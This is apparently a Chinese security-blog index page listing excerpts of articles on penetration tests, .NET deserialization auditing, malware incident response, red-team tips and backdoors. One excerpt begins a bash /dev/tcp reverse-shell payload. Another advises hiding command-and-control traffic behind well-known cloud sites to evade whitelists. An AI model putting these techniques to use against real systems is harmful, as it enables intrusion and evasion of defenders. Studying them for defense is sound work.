一次平平无奇的渗透测试(渗透测试实验)
这是 酒仙桥六号部队 的第 100 篇文章。全文共计2096个字,预计阅读时长8分钟。前言接了个项目,给了资产列表,刚开始就只挖了几个小洞,正当自暴自弃、随缘挖洞的时候,点开了...
一份通告引发的内网突破
这是 酒仙桥六号部队 的第 131 篇文章。全文共计2834个字,预计阅读时长9分钟。一、前言本文记录某项目,在开始尝试各类漏洞未果的情况下,利用平台的逻辑缺陷,打造出一份高质...
Bash Special Redirection 分析
Bash Special Redirection 分析安全脉搏SecPulse.Com独家发文,如需转载,请先联系授权。0x00 Background在反弹 shell 的时候经常遇到这样的 payload:bash -i 1>&/dev/tcp/${H...
.NET高级代码审计(第二课) Json.Net反序列化漏洞
0X00 前言Newtonsoft.Json,这是一个开源的Json.Net库,官方地址:https://www.newtonsoft.com/json ,一个读写Json效率非常高的.Net库,在做开发的时候,很多数据交换都是以json格式传输...
实战某高校的一次挖矿病毒的应急处置(大学生挖矿被抓)
0x00 缘起在风和日丽的周五,我抱着今天搬完砖明天葛优躺的心态开开心心、快快乐乐的工作,没成想刚接到一通电话,电话的那边传来周六需要加班的噩耗,直接打破了周六的葛优躺计划,我周六加班...
红队与渗透测试tips(渗透测试实战第三版(红队版)
我收集了一些渗透测试tips,同时欢迎大家补充。1.使用高知名度的网站(如:Google ,aws)做C&C 控制服务器,这样可以绕过白名单限制;2.使用cleanwipe删除文件,因为它不需要管理员权限;...
高级持续渗透-第四季关于后门
本文作者:Micropoor本文属于安全脉搏专栏作者分享暨金币奖励计划转载请参考:https://www.secpulse.com/archives/61458.html第四季是一个过渡季,过渡后门在对抗升级中由传统后门,衍生成锁定...
WECHAT二维码闪退分析(微信扫二维码会闪退是什么情况)
作者:hu1y40(洞源实验室,安全工程师) 一、 事件背景腾讯旗下的微信是一款社交通讯应用程序,由中国互联网巨头腾讯公司开发和运营。作为一款领先的社交应用,微信在全球范围内拥有...
.NET高级代码审计(第六课) DataContractSerializer反序列化漏洞
0X00 前言DataContractSerializer类用于序列化和反序列化Windows Communication Foundation (WCF) 消息中发送的数据,用于把CLR数据类型序列化成XML流,它位于命名空间System.Runtime...
记一次渗透之路(渗透经历)
这是 酒仙桥六号部队 的第 98 篇文章。全文共计2024个字,预计阅读时长8分钟。背景前不久,同学短信收到一条日赚百万的短信,在强大的诱惑下没忍住点了进去,开始走上一条...
